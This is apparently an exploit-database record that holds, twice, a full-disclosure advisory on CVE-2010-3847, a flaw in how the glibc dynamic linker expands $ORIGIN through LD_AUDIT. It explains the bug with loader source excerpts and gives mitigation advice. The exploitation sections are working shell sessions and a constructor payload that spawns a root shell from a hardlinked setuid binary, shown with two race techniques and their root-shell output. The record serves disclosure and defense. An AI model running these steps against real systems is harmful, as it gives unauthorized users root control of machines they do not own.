\n \nHowever, I have now discovered a way to exploit this. The origin expansion \nmechanism is recycled for use in LD_AUDIT support, although an attempt is made \nto prevent it from working, it is insufficient. \n \nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit \nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does. \nHowever, $ORIGIN expansion is only prevented if it is not used in isolation. \n \nThe codepath that triggers this expansion is \n \n_dl_init_paths() -> _dl_dst_substitute() -> _is_dst() \n \n(in the code below DST is dynamic string token) \n \nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741 \n \n741 /* Expand DSTs. */ \n742 size_t cnt = DL_DST_COUNT (llp, 1); \n743 if (__builtin_expect (cnt == 0, 1)) \n744 llp_tmp = strdupa (llp); \n745 else \n746 { \n747 /* Determine the length of the substituted string. */ \n748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt); \n749 \n750 /* Allocate the necessary memory. */ \n751 llp_tmp = (char *) alloca (total + 1); \n752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1); \n753 } \n \nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245 \n \n253 if (__builtin_expect (*name == '$', 0)) \n254 { \n255 const char *repl = NULL; \n256 size_t len; \n257 \n258 ++name; \n259 if ((len = is_dst (start, name, \"ORIGIN\", is_path, \n260 INTUSE(__libc_enable_secure))) != 0) \n261 { \n... 
\n267 repl = l->l_origin; \n268 } \n \nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171 \n \n \n202 if (__builtin_expect (secure, 0) \n203 && ((name[len] != '\\0' && (!is_path || name[len] != ':')) \n204 || (name != start + 1 && (!is_path || name[-2] != ':')))) \n205 return 0; \n206 \n207 return len; \n208 } \n \nAs you can see, $ORIGIN is only expanded if it is alone and first in the path. \nThis makes little sense, and does not appear to be useful even if there were \nno security impact. This was most likely the result of an attempt to re-use the \nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally \nintroducing this error. \n \nPerhaps surprisingly, this error is exploitable. \n \n-------------------- \nAffected Software \n------------------------ \n \nAt least the following versions have been tested \n \n2.12.1, FC13 \n2.5, RHEL5 / CentOS5 \n \nOther versions are probably affected, possibly via different vectors. I'm aware \nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I \ndo not know if it's possible to avoid this. \n \n-------------------- \nConsequences \n----------------------- \n \nIt is possible to exploit this flaw to execute arbitrary code as root. \n \nPlease note, this is a low impact vulnerability that is only of interest to \nsecurity professionals and system administrators. End users do not need \nto be concerned. \n \nExploitation would look like the following. \n \n# Create a directory in /tmp we can control. \n$ mkdir /tmp/exploit \n \n# Link to an suid binary, thus changing the definition of $ORIGIN. \n$ ln /bin/ping /tmp/exploit/target \n \n# Open a file descriptor to the target binary (note: some users are surprised \n# to learn exec can be used to manipulate the redirections of the current \n# shell if a command is not specified. This is what is happening below). 
\n$ exec 3< /tmp/exploit/target \n \n# This descriptor should now be accessible via /proc. \n$ ls -l /proc/$$/fd/3 \nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target* \n \n# Remove the directory previously created \n$ rm -rf /tmp/exploit/ \n \n# The /proc link should still exist, but now will be marked deleted. \n$ ls -l /proc/$$/fd/3 \nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted) \n \n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen(). \n$ cat > payload.c \nvoid __attribute__((constructor)) init() \n{ \nsetuid(0); \nsystem(\"/bin/bash\"); \n} \n^D \n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c \n$ ls -l /tmp/exploit \n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit* \n \n# Now force the link in /proc to load $ORIGIN via LD_AUDIT. \n$ LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3 \nsh-4.1# whoami \nroot \nsh-4.1# id \nuid=0(root) gid=500(taviso) \n \n------------------- \nMitigation \n----------------------- \n \nIt is a good idea to prevent users from creating files on filesystems mounted \nwithout nosuid. The following interesting solution for administrators who \ncannot modify their partitioning scheme was suggested to me by Rob Holland \n(@robholland): \n \nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid, \nfor example: \n \n# mount -o bind /tmp /tmp \n# mount -o remount,bind,nosuid /tmp /tmp \n \nBe aware of race conditions at boot via crond/atd/etc, and users with \nreferences to existing directories (man lsof), but this may be an acceptable \nworkaround until a patch is ready for deployment. \n \n(Of course you need to do this everywhere untrusted users can make links to \nsuid/sgid binaries. find(1) is your friend). \n \nIf someone wants to create an init script that would automate this at boot for \ntheir distribution, I'm sure it would be appreciated by other administrators. 
\n \n------------------- \nSolution \n----------------------- \n \nMajor distributions should be releasing updated glibc packages shortly. \n \n------------------- \nCredit \n----------------------- \n \nThis bug was discovered by Tavis Ormandy. \n \n------------------- \nGreetz \n----------------------- \n \nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert, \nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D., \nand all my other elite friends and colleagues. \n \nAdditional greetz to the openwall guys who saw this problem coming years ago. \nThey continue to avoid hundreds of security vulnerabilities each year thanks to \ntheir insight into systems security. \n \nhttp://www.openwall.com/owl/ \n \n------------------- \nNotes \n----------------------- \n \nThere are several known techniques to exploit dynamic loader bugs for suid \nbinaries, the fexecve() technique listed in the Consequences section above is a \nmodern technique, making use of relatively recent Linux kernel features (it was \nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I \nbelieve Gabriel Campana came up with the same solution independently). \n \nThe classic UNIX technique is a little less elegant, but has the advantage that \nread access is not required for the target binary. It is rather common for \nadministrators to remove read access from suid binaries in order to make \nattackers work a little harder, so I will document it here for reference. \n \nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16 \nbytes capacity on Linux, see the section on \"Pipe Capacity\" in pipe(7) from the \nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(), \nanything written to stderr will block, so you simply execve() and then make the \nloader print some error message, allowing you to reliably win any race \ncondition. 
\n \nLD_DEBUG has always been a a good candidate for getting error messages on \nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to \nsome minor complaints about information leaks, but it can still be used with a \nslight modification (I first learned of this technique from a bugtraq posting \nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281). \n \nThe exploit flow for this alternative attack is a little more complicated, but \nwe can still use the shell to do it (this session is from an FC13 system, \noutput cleaned up for clarity). \n \n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection. \n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT=\"\\$ORIGIN\" /tmp/exploit/target 2>&1) | (sleep 1h; cat) & \n[1] 26926 \n \n# Now ld.so is blocked on write() in the background trying to say \"invalid \n# debug option\", so we are free to manipulate the filesystem. \n$ rm -rf /tmp/exploit/ \n \n# Put exploit payload in place. \n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c \n \n# Clear the pipe by killing sleep, letting cat drain the contents. This will \n# unblock the target, allowing it to continue. \n$ pkill -n -t $(tty | sed 's#/dev/##') sleep \n-bash: line 99: 26929 Terminated sleep 1h \n \n# And now we can take control of a root shell :-) \n$ fg \nsh-4.1# id \nuid=0(root) gid=500(taviso) \n \nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then \nwhile the loader is trying to map lots of memory, you have a good chance of \nwinning any race. I previously found an integer overflow in this feature and \nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc \nmaintainers disagreed and just fixed the overflow. 
\n \nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html \n \nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the \nnext big loader bug is going to be, it's just not safe to let attackers have \nthat much control over the execution environment of privileged programs. \n \nFinally, some notes on ELF security for newcomers. The following common \nconditions are usually exploitable: \n \n- An empty DT_RPATH, i.e. -Wl,-rpath,\"\" \nThis is a surprisingly common build error, due to variable expansion \nfailing during the build process. \n- A relative, rather than absolute DT_RPATH. \nFor example, -Wl,-rpath,\"lib/foo\". \n \nI'll leave it as an exercise for the interested reader to explain why. Remember \nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths \nfor their dependencies, and so on. \n \n------------------- \nReferences \n----------------------- \n \n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual. \n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual. \n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual. \n- Linkers and Loaders, John R. Levine, ISBN 1-55860-496-0. \n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574 \n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html \n \nYou should subscribe to Linux Weekly News and help support their high standard \nof security journalism. \n \nhttp://lwn.net/ \n \nI have a twitter account where I occasionally comment on security topics. 
\n \nhttp://twitter.com/taviso \n \nex$$ \n \n-- \n------------------------------------- \ntaviso@cmpxchg8b.com | pgp encrypted mail preferred \n------------------------------------------------------- \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/94955/gnuc-origin.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2022-01-13T06:50:14", "description": "", "cvss3": {}, "published": "2010-10-18T00:00:00", "type": "exploitdb", "title": "GNU C library dynamic linker - '$ORIGIN' Expansion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847", "2011-0536", "2010-3847"], "modified": "2010-10-18T00:00:00", "id": "EDB-ID:15274", "href": "https://www.exploit-db.com/exploits/15274", "sourceData": "from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2\r\n\r\nThe GNU C library dynamic linker expands $ORIGIN in setuid library search path\r\n------------------------------------------------------------------------------\r\n\r\nGruezi, This is CVE-2010-3847.\r\n\r\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\r\ndynamically linked programs. 
ld.so operates in two security modes, a permissive\r\nmode that allows a high degree of control over the load operation, and a secure\r\nmode (libc_enable_secure) intended to prevent users from interfering with the\r\nloading of privileged executables.\r\n\r\n$ORIGIN is an ELF substitution sequence representing the location of the\r\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\r\nexecutables to specify a search path for libraries that is relative to their\r\nlocation, to simplify packaging without spamming the standard search paths with\r\nsingle-use libraries.\r\n\r\nNote that despite the confusing naming convention, $ORIGIN is specified in a\r\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\r\nenvironment (developers would normally use the -rpath ld parameter, or\r\n-Wl,-rpath,$ORIGIN via the compiler driver).\r\n\r\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\r\nbinaries,\r\n\r\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\r\n\r\n\"For security, the dynamic linker does not allow use of $ORIGIN substitution\r\n sequences for set-user and set-group ID programs. For such sequences that\r\n appear within strings specified by DT_RUNPATH dynamic array entries, the\r\n specific search path containing the $ORIGIN sequence is ignored (though other\r\n search paths in the same string are processed). $ORIGIN sequences within a\r\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\r\n errors. The same restrictions may be applied to processes that have more than\r\n minimal privileges on systems with installed extended security mechanisms.\"\r\n\r\nHowever, glibc ignores this recommendation. 
The attack the ELF designers were\r\nlikely concerned about is users creating hardlinks to suid executables in\r\ndirectories they control and then executing them, thus controlling the\r\nexpansion of $ORIGIN.\r\n\r\nIt is tough to form a thorough complaint about this glibc behaviour however,\r\nas any developer who believes they're smart enough to safely create suid\r\nprograms should be smart enough to understand the implications of $ORIGIN\r\nand hard links on load behaviour. The glibc maintainers are some of the\r\nsmartest guys in free software, and well known for having a \"no hand-holding\"\r\nstance on various issues, so I suspect they wanted a better argument than this\r\nfor modifying the behaviour (I pointed it out a few years ago, but there was\r\nlittle interest).\r\n\r\nHowever, I have now discovered a way to exploit this. The origin expansion\r\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\r\nto prevent it from working, it is insufficient.\r\n\r\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\r\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\r\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\r\n\r\nThe codepath that triggers this expansion is\r\n\r\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\r\n\r\n(in the code below DST is dynamic string token)\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\r\n\r\n 741 /* Expand DSTs. */\r\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\r\n 743 if (__builtin_expect (cnt == 0, 1))\r\n 744 llp_tmp = strdupa (llp);\r\n 745 else\r\n 746 {\r\n 747 /* Determine the length of the substituted string. */\r\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n 749\r\n 750 /* Allocate the necessary memory. 
*/\r\n 751 llp_tmp = (char *) alloca (total + 1);\r\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n 753 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\r\n\r\n 253 if (__builtin_expect (*name == '$', 0))\r\n 254 {\r\n 255 const char *repl = NULL;\r\n 256 size_t len;\r\n 257\r\n 258 ++name;\r\n 259 if ((len = is_dst (start, name, \"ORIGIN\", is_path,\r\n 260 INTUSE(__libc_enable_secure))) != 0)\r\n 261 {\r\n ...\r\n 267 repl = l->l_origin;\r\n 268 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\r\n\r\n\r\n 202 if (__builtin_expect (secure, 0)\r\n 203 && ((name[len] != '\\0' && (!is_path || name[len] != ':'))\r\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\r\n 205 return 0;\r\n 206\r\n 207 return len;\r\n 208 }\r\n\r\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\r\nThis makes little sense, and does not appear to be useful even if there were\r\nno security impact. This was most likely the result of an attempt to re-use the\r\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\r\nintroducing this error.\r\n\r\nPerhaps surprisingly, this error is exploitable.\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAt least the following versions have been tested\r\n\r\n 2.12.1, FC13\r\n 2.5, RHEL5 / CentOS5\r\n\r\nOther versions are probably affected, possibly via different vectors. 
I'm aware\r\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\r\ndo not know if it's possible to avoid this.\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nIt is possible to exploit this flaw to execute arbitrary code as root.\r\n\r\nPlease note, this is a low impact vulnerability that is only of interest to\r\nsecurity professionals and system administrators. End users do not need\r\nto be concerned.\r\n\r\nExploitation would look like the following.\r\n\r\n# Create a directory in /tmp we can control.\r\n$ mkdir /tmp/exploit\r\n\r\n# Link to an suid binary, thus changing the definition of $ORIGIN.\r\n$ ln /bin/ping /tmp/exploit/target\r\n\r\n# Open a file descriptor to the target binary (note: some users are surprised\r\n# to learn exec can be used to manipulate the redirections of the current\r\n# shell if a command is not specified. This is what is happening below).\r\n$ exec 3< /tmp/exploit/target\r\n\r\n# This descriptor should now be accessible via /proc.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\r\n\r\n# Remove the directory previously created\r\n$ rm -rf /tmp/exploit/\r\n\r\n# The /proc link should still exist, but now will be marked deleted.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)\r\n\r\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().\r\n$ cat > payload.c\r\nvoid __attribute__((constructor)) init()\r\n{\r\n setuid(0);\r\n system(\"/bin/bash\");\r\n}\r\n^D\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n$ ls -l /tmp/exploit\r\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\r\n\r\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\r\n$ LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3\r\nsh-4.1# whoami\r\nroot\r\nsh-4.1# id\r\nuid=0(root) 
gid=500(taviso)\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIt is a good idea to prevent users from creating files on filesystems mounted\r\nwithout nosuid. The following interesting solution for administrators who\r\ncannot modify their partitioning scheme was suggested to me by Rob Holland\r\n(@robholland):\r\n\r\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\r\nfor example:\r\n\r\n# mount -o bind /tmp /tmp\r\n# mount -o remount,bind,nosuid /tmp /tmp\r\n\r\nBe aware of race conditions at boot via crond/atd/etc, and users with\r\nreferences to existing directories (man lsof), but this may be an acceptable\r\nworkaround until a patch is ready for deployment.\r\n\r\n(Of course you need to do this everywhere untrusted users can make links to\r\nsuid/sgid binaries. find(1) is your friend).\r\n\r\nIf someone wants to create an init script that would automate this at boot for\r\ntheir distribution, I'm sure it would be appreciated by other administrators.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMajor distributions should be releasing updated glibc packages shortly.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\r\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\r\nand all my other elite friends and colleagues.\r\n\r\nAdditional greetz to the openwall guys who saw this problem coming years ago.\r\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\r\ntheir insight into systems security.\r\n\r\nhttp://www.openwall.com/owl/\r\n\r\n-------------------\r\nNotes\r\n-----------------------\r\n\r\nThere are several known techniques to exploit dynamic loader bugs for suid\r\nbinaries, the fexecve() technique listed in 
the Consequences section above is a\r\nmodern technique, making use of relatively recent Linux kernel features (it was\r\nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I\r\nbelieve Gabriel Campana came up with the same solution independently).\r\n\r\nThe classic UNIX technique is a little less elegant, but has the advantage that\r\nread access is not required for the target binary. It is rather common for\r\nadministrators to remove read access from suid binaries in order to make\r\nattackers work a little harder, so I will document it here for reference.\r\n\r\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\r\nbytes capacity on Linux, see the section on \"Pipe Capacity\" in pipe(7) from the\r\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\r\nanything written to stderr will block, so you simply execve() and then make the\r\nloader print some error message, allowing you to reliably win any race\r\ncondition.\r\n\r\nLD_DEBUG has always been a good candidate for getting error messages on\r\nLinux. 
The behaviour of LD_DEBUG was modified a few years ago in response to\r\nsome minor complaints about information leaks, but it can still be used with a\r\nslight modification (I first learned of this technique from a bugtraq posting\r\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\r\n\r\nThe exploit flow for this alternative attack is a little more complicated, but\r\nwe can still use the shell to do it (this session is from an FC13 system,\r\noutput cleaned up for clarity).\r\n\r\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\r\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT=\"\\$ORIGIN\" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &\r\n[1] 26926\r\n\r\n# Now ld.so is blocked on write() in the background trying to say \"invalid\r\n# debug option\", so we are free to manipulate the filesystem.\r\n$ rm -rf /tmp/exploit/\r\n\r\n# Put exploit payload in place.\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n\r\n# Clear the pipe by killing sleep, letting cat drain the contents. This will\r\n# unblock the target, allowing it to continue.\r\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\r\n-bash: line 99: 26929 Terminated sleep 1h\r\n\r\n# And now we can take control of a root shell :-)\r\n$ fg\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\r\nwhile the loader is trying to map lots of memory, you have a good chance of\r\nwinning any race. 
I previously found an integer overflow in this feature and\r\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\r\nmaintainers disagreed and just fixed the overflow.\r\n\r\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\r\n\r\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\r\nnext big loader bug is going to be, it's just not safe to let attackers have\r\nthat much control over the execution environment of privileged programs.\r\n\r\nFinally, some notes on ELF security for newcomers. The following common\r\nconditions are usually exploitable:\r\n\r\n - An empty DT_RPATH, i.e. -Wl,-rpath,\"\"\r\n This is a surprisingly common build error, due to variable expansion\r\n failing during the build process.\r\n - A relative, rather than absolute DT_RPATH.\r\n For example, -Wl,-rpath,\"lib/foo\".\r\n\r\nI'll leave it as an exercise for the interested reader to explain why. Remember\r\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\r\nfor their dependencies, and so on.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\r\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.\r\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.\r\n- Linkers and Loaders, John R. 
Levine, ISBN 1-55860-496-0.\r\n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574\r\n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\r\n\r\nYou should subscribe to Linux Weekly News and help support their high standard\r\nof security journalism.\r\n\r\nhttp://lwn.net/\r\n\r\nI have a twitter account where I occasionally comment on security topics.\r\n\r\nhttp://twitter.com/taviso\r\n\r\nex$$", "sourceHref": "https://www.exploit-db.com/download/15274", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
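For the Mitigation section of the advisory quoted above, a check an administrator could run, given here as an added example that is not part of the original advisory or of glibc. It reports which directories are governed by a mount that lacks nosuid and lists set-uid/set-gid files that already have more than one hard link. The directory list, the /usr/bin scan root and all function names are assumptions, and the mount table is a constructed sample.

```python
import os
import stat

# Constructed /proc/mounts sample: only /tmp has been remounted nosuid.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda1 /tmp ext4 rw,nosuid,relatime 0 0
"""

def parse_mounts(text):
    """Return [(mount_point, options)] in mount order."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4:  # device, mount point, fstype, options, ...
            point = fields[1].replace("\\040", " ")  # spaces are octal-escaped
            mounts.append((point, set(fields[3].split(","))))
    return mounts

def effective_mount(path, mounts):
    """Longest mount-point prefix of path; a later entry wins a tie."""
    path, best = os.path.normpath(path), None
    for point, opts in mounts:
        if path == point or path.startswith(point.rstrip("/") + "/"):
            if best is None or len(point) >= len(best[0]):
                best = (point, opts)
    return best

def dirs_allowing_suid(dirs, mounts_text):
    """(dir, mount point) pairs whose governing mount lacks nosuid."""
    mounts = parse_mounts(mounts_text)
    found = [(d, effective_mount(d, mounts)) for d in dirs]
    return [(d, m[0]) for d, m in found if m and "nosuid" not in m[1]]

def multiply_linked_setid(root):
    """Set-uid/set-gid regular files under root with more than one link."""
    hits = []
    for base, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(base, name)
            st = os.lstat(path)
            # 0o6000 is the set-uid and set-gid bits together.
            if stat.S_ISREG(st.st_mode) and st.st_mode & 0o6000 and st.st_nlink > 1:
                hits.append((path, st.st_nlink))
    return hits

if __name__ == "__main__":
    with open("/proc/mounts") as fh:
        print(dirs_allowing_suid(["/tmp", "/var/tmp", "/dev/shm"], fh.read()))
    print(multiply_linked_setid("/usr/bin"))
```

Some distributions ship set-id programs under several hard-linked names, so treat the second list as items to review against the package database.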
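For the closing notes on DT_RPATH in the advisory above, an added example (not from the advisory or from binutils) that reads `readelf -d` output, flags empty, relative and $ORIGIN-based RPATH/RUNPATH components, and collects DT_NEEDED names so dependencies can be checked the same way. The readelf excerpt is constructed and the function names are assumptions.

```python
import re

# Constructed `readelf -d` excerpt (not taken from a real binary).
SAMPLE_READELF = """\
 0x0000000000000001 (NEEDED)             Shared library: [libfoo.so.1]
 0x000000000000000f (RPATH)              Library rpath: [lib/foo:/usr/lib/foo]
 0x000000000000001d (RUNPATH)            Library runpath: [$ORIGIN/../lib:]
"""

ENTRY = re.compile(r"\((RPATH|RUNPATH)\)\s+Library r(?:un)?path: \[(.*)\]")
NEEDED = re.compile(r"\(NEEDED\)\s+Shared library: \[(.*)\]")

def classify(component):
    """Return a finding for one search-path component, or None if absolute."""
    if component == "":
        return "empty"       # e.g. -Wl,-rpath,"" or a stray ':' separator
    if component.startswith(("$ORIGIN", "${ORIGIN}")):
        return "origin"      # expands to the directory holding the executable
    if not component.startswith("/"):
        return "relative"    # resolved against the current directory
    return None

def audit_dynamic(readelf_text):
    """Return [(tag, component, finding)] for RPATH/RUNPATH entries to review."""
    findings = []
    for line in readelf_text.splitlines():
        m = ENTRY.search(line)
        if not m:
            continue
        tag, value = m.groups()
        for comp in value.split(":"):
            kind = classify(comp)
            if kind:
                findings.append((tag, comp, kind))
    return findings

def needed_libs(readelf_text):
    """DT_NEEDED names, so each dependency can be audited in turn."""
    return NEEDED.findall(readelf_text)

if __name__ == "__main__":
    import subprocess, sys
    for path in sys.argv[1:]:
        out = subprocess.run(["readelf", "-d", path],
                             capture_output=True, text=True).stdout
        for finding in audit_dynamic(out):
            print(path, *finding)
```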